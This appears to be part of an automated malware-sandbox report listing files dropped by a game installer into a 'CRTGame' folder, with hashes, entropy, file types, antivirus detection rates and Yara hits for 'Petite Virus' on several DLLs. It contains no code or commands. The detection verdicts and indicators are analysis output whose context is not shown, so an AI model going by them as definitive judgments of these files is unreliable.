                                                                                          MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                          SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                          SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                          SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):967168
                                                                                          Entropy (8bit):6.500850562754145
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                          MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                          SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                          SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                          SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):62478
                                                                                          Entropy (8bit):6.063363187934607
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                          MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                          SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                          SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                          SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):512014
                                                                                          Entropy (8bit):6.566561154468342
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                          MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                          SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                          SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                          SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):5960
                                                                                          Entropy (8bit):5.956401374574174
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                          MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                          SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                          SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                          SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):115712
                                                                                          Entropy (8bit):6.401537154757194
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                          MD5:840D631DA54C308B23590AD6366EBA77
                                                                                          SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                          SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                          SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):123406
                                                                                          Entropy (8bit):6.263889638223575
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                          MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                          SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                          SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                          SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):35588
                                                                                          Entropy (8bit):7.817557274117395
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                          MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                          SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                          SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                          SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):18966
                                                                                          Entropy (8bit):7.620111275837424
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                          MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                          SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                          SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                          SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):394752
                                                                                          Entropy (8bit):6.662070316214798
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                          MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                          SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                          SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                          SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):867854
                                                                                          Entropy (8bit):4.9264497464202694
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                          MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                          SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                          SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                          SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):112640
                                                                                          Entropy (8bit):6.540227486061059
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                          MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                          SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                          SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                          SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):266254
                                                                                          Entropy (8bit):6.343813822604148
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                                          MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                                          SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                                          SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                                          SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):7910
                                                                                          Entropy (8bit):6.931925007191986
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                          MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                          SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                          SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                          SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34392
                                                                                          Entropy (8bit):7.81689943223162
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                          MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                          SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                          SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                          SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):26526
                                                                                          Entropy (8bit):4.600837395607617
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                          MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                          SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                          SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                          SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                          Malicious:false
                                                                                          Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):68876
                                                                                          Entropy (8bit):7.922125376804506
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                          MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                          SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                          SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                          SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):562190
                                                                                          Entropy (8bit):6.388293171196564
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                          MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                          SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                          SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                          SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):315918
                                                                                          Entropy (8bit):6.5736483262229735
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                          MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                          SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                          SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                          SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):214016
                                                                                          Entropy (8bit):6.676457645865373
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                          MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                          SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                          SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                          SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                          Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):240654
Entropy (8bit):6.518503846592995
Encrypted:false
SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:4F0C85351AEC4B00300451424DB4B5A4
SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):197646
Entropy (8bit):6.1570532273946625
Encrypted:false
SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
MD5:2C8EC61630F8AA6AAC674E4C63F4C973
SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):13838
Entropy (8bit):5.173769974589746
Encrypted:false
SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):648384
Entropy (8bit):6.666474522542094
Encrypted:false
SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):15374
Entropy (8bit):5.192037544202194
Encrypted:false
SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:BEFD36FE8383549246E1FD49DB270C07
SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11532
Entropy (8bit):7.219753259626605
Encrypted:false
SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
MD5:073F34B193F0831B3DD86313D74F1D2A
SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
Malicious:false
Yara Hits:
• Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp, Author: Joe Security

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):43520
Entropy (8bit):6.232860260916194
Encrypted:false
SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
MD5:B162992412E08888456AE13BA8BD3D90
SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):31936
Entropy (8bit):6.6461204214578
Encrypted:false
SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):112640
Entropy (8bit):6.540227486061059
Encrypted:false
SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
